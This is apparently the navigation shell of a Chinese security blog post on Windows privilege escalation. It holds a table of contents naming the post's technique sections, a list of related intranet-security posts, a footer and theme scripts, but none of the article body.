class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80"><span class="toc-number">1.</span> <span class="toc-text"> 提权基础</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%B6%E9%9B%86%E4%BF%A1%E6%81%AF%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4"><span class="toc-number">2.</span> <span class="toc-text"> 收集信息常用命令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#whoami-all"><span class="toc-number">2.1.</span> <span class="toc-text"> whoami &#x2F;all</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#hostname"><span class="toc-number">2.2.</span> <span class="toc-text"> hostname</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#whoami-priv"><span class="toc-number">2.3.</span> <span class="toc-text"> whoami &#x2F;priv</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#net-start"><span class="toc-number">2.4.</span> <span class="toc-text"> net start</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#systeminfo"><span class="toc-number">2.5.</span> <span class="toc-text"> systeminfo</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E5%8F%AF%E5%86%99%E5%8F%AF%E8%AF%BB%E7%9B%AE%E5%BD%95"><span class="toc-number">2.6.</span> <span class="toc-text"> 扫描可写可读目录</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#windows%E5%B8%B8%E7%94%A8%E6%8F%90%E6%9D%83"><span class="toc-number">3.</span> <span class="toc-text"> windows 常用提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ms16-075%E7%83%82%E5%9C%9F%E8%B1%86%E6%8F%90%E6%9D%83"><span class="toc-number">3.1.</span> <span class="toc-text"> MS16-075 烂土豆提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ms14-058%E6%8F%90%E6%9D%83"><span class="toc-number">3.2.</span> <span class="toc-text"> MS14-058 提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#cve-2020-0787"><span class="toc-number">3.3.</span> <span class="toc-text"> CVE-2020-0787</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#msf%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text"> msf 利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#uac%E6%8F%90%E6%9D%83"><span class="toc-number">5.</span> <span class="toc-text"> UAC 提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#windows%E7%B3%BB%E7%BB%9F%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF%E6%8F%90%E6%9D%83"><span class="toc-number">6.</span> <span class="toc-text"> windows 系统配置错误提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%E6%9D%83%E9%99%90%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF"><span class="toc-number">6.1.</span> <span class="toc-text"> 系统服务权限配置错误</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%8D%E5%B8%A6%E5%BC%95%E5%8F%B7%E7%9A%84%E6%9C%8D%E5%8A%A1%E8%B7%AF%E5%BE%84"><span class="toc-number">6.2.</span> <span class="toc-text"> 不带引号的服务路径</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dll%E5%8A%AB%E6%8C%81%E6%8F%90%E6%9D%83"><span class="toc-number">7.</span> <span class="toc-text"> DLL 劫持提权</span></a></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li ><a href="/2023/10/30/network-security/neiwang/%E5%9F%9F%E7%8E%AF%E5%A2%83/%E5%9F%9F%E7%8E%AF%E5%A2%83/" rel="bookmark" title="域环境">域环境</a></li><li  class="active"><a href="/2023/11/09/network-security/neiwang/Windows%E6%8F%90%E6%9D%83/Windows%E6%8F%90%E6%9D%83/" rel="bookmark" title="Windows提权">Windows提权</a></li><li ><a href="/2023/11/10/network-security/neiwang/linux%E6%8F%90%E6%9D%83/linux%E6%8F%90%E6%9D%83/" rel="bookmark" title="linux提权">linux提权</a></li><li ><a href="/2024/03/03/network-security/neiwang/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="bookmark" title="内网信息收集">内网信息收集</a></li><li ><a href="/2024/03/05/network-security/neiwang/win%E5%8D%8F%E8%AE%AE/win%E5%8D%8F%E8%AE%AE/" rel="bookmark" title="win协议认证知识">win协议认证知识</a></li><li ><a href="/2024/03/07/network-security/neiwang/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/" rel="bookmark" title="Token窃取利用">Token窃取利用</a></li><li ><a href="/2024/03/08/network-security/neiwang/BloodHound%E5%B7%A5%E5%85%B7/BloodHound%E5%B7%A5%E5%85%B7/" rel="bookmark" title="BloodHound工具">BloodHound工具</a></li><li ><a href="/2024/03/09/network-security/neiwang/%E5%9F%9F%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E5%AF%86%E7%A0%81%E5%96%B7%E6%B4%92/%E5%9F%9F%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E5%AF%86%E7%A0%81%E5%96%B7%E6%B4%92/" rel="bookmark" title="域用户枚举密码喷洒">域用户枚举密码喷洒</a></li><li ><a href="/2024/03/12/network-security/neiwang/Kerberoasting%E6%94%BB%E5%87%BB/Kerberoasting%E6%94%BB%E5%87%BB/" rel="bookmark" title="Kerberoasting攻击">Kerberoasting攻击</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" itemprop="image" alt="云逸" data-src="/assets/avatar.jpg"/><p class="name" itemprop="name">云逸</p><div class="description" itemprop="description"></div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">29</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">13</span><span class="name">分类</span></a></div></nav><div class="social"><a href="https://gyzero1.github.io/" class="item github" rel="noopener" title="https:&#x2F;&#x2F;gyzero1.github.io&#x2F;" target="_blank"><i class="ic i-github"></i></a><a href="https://about.me/gyzero" class="item about" rel="noopener" title="https:&#x2F;&#x2F;about.me&#x2F;gyzero" target="_blank"><i class="ic i-address-card"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-user"></i>关于</a><ul class="submenu"><li class="item"><a href="/about/" rel="section"><i class="ic i-user"></i>关于本站</a></li><li class="item"><a href="/admiration/" rel="section"><i class="ic i-coffee"></i>赞赏博主</a></li></ul></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li><li class="item"><a href="/categories" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li></ul></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>友链</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2023/11/10/network-security/neiwang/linux%E6%8F%90%E6%9D%83/linux%E6%8F%90%E6%9D%83/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2023/11/09/%E6%BC%8F%E6%B4%9E/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/sqls/" title="分类于数据库">数据库</a></div><span><a href="/2023/11/01/sqls/mysql/mysql%E5%A2%9E%E5%88%A0%E6%94%B9%E6%9F%A5/">mysql增删改查</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2023/11/09/network-security/neiwang/Windows%E6%8F%90%E6%9D%83/Windows%E6%8F%90%E6%9D%83/">Windows提权</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/" title="分类于web安全">web安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/Basic-vulnerabilities/" title="分类于基础漏洞">基础漏洞</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/Basic-vulnerabilities/sql/" title="分类于sql注入">sql注入</a></div><span><a href="/2023/10/31/%E6%BC%8F%E6%B4%9E/sql%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87/">sql注入绕过</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2024/03/07/network-security/neiwang/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/">Token窃取利用</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2023/11/12/network-security/neiwang/%E7%BB%95%E9%98%B2%E7%81%AB%E5%A2%99/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/">端口转发</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/" title="分类于web安全">web安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/Basic-vulnerabilities/" title="分类于基础漏洞">基础漏洞</a></div><span><a href="/2023/11/05/%E6%BC%8F%E6%B4%9E/csrf%E6%BC%8F%E6%B4%9E/">CSRF漏洞</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/" title="分类于web安全">web安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/Basic-vulnerabilities/" title="分类于基础漏洞">基础漏洞</a></div><span><a href="/2023/11/01/%E6%BC%8F%E6%B4%9E/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">命令执行漏洞</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/" title="分类于编程语言">编程语言</a><i class="ic i-angle-right"></i><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/" title="分类于php基础">php基础</a></div><span><a href="/2023/11/16/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/php%E8%AF%AD%E6%B3%95-%E5%8F%98%E9%87%8F/php%E8%AF%AD%E6%B3%95-%E5%8F%98%E9%87%8F/">php语法-变量</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2024/03/12/network-security/neiwang/Kerberoasting%E6%94%BB%E5%87%BB/Kerberoasting%E6%94%BB%E5%87%BB/">Kerberoasting攻击</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/" title="分类于编程语言">编程语言</a><i class="ic i-angle-right"></i><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/" title="分类于php基础">php基础</a></div><span><a href="/2023/12/12/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/PHP%E8%BF%90%E7%AE%97%E7%AC%A6/PHP%E8%BF%90%E7%AE%97%E7%AC%A6/">PHP运算符</a></span></li></ul></div><div class="rpost pjax"><h2>最新评论</h2><ul class="leancloud-recent-comment" id="new-comment"></ul></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2024</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">云逸 @ 云逸'bolg</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">198k 字</span><span class="post-meta-divider">|</span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">3:01</span></div><div class="powered-by">基于 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & Theme.<a href="https://github.com/theme-shoka-x/hexo-theme-shokaX/" rel="noopener" target="_blank">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
        path: `2023/11/09/network-security/neiwang/Windows提权/Windows提权/`,
        favicon: {
        show: `（●´3｀●）やれやれだぜ`,
        hide: `(´Д｀)大変だ！`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,
    chart: false,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    fancybox: true,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    },
    ignores: [
        (uri) => uri.includes('#'),
        (uri) => new RegExp(LOCAL.path + '$').test(uri),
            []
    ]
};
</script><script src="https://polyfill.io/v3/polyfill.min.js?features=default,fetch"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/pace/1.0.2/pace.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/algoliasearch/4.12.1/algoliasearch-lite.umd.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/instantsearch.js/4.39.0/instantsearch.production.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/quicklink/2.2.0/quicklink.umd.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/??jquery/3.5.1/jquery.min.js,fancybox/3.5.7/jquery.fancybox.min.js,justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js" async></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/KaTeX/0.15.2/contrib/copy-tex.min.js" async></script><script src="/js/app.js?v=0.3.6"></script></body></html>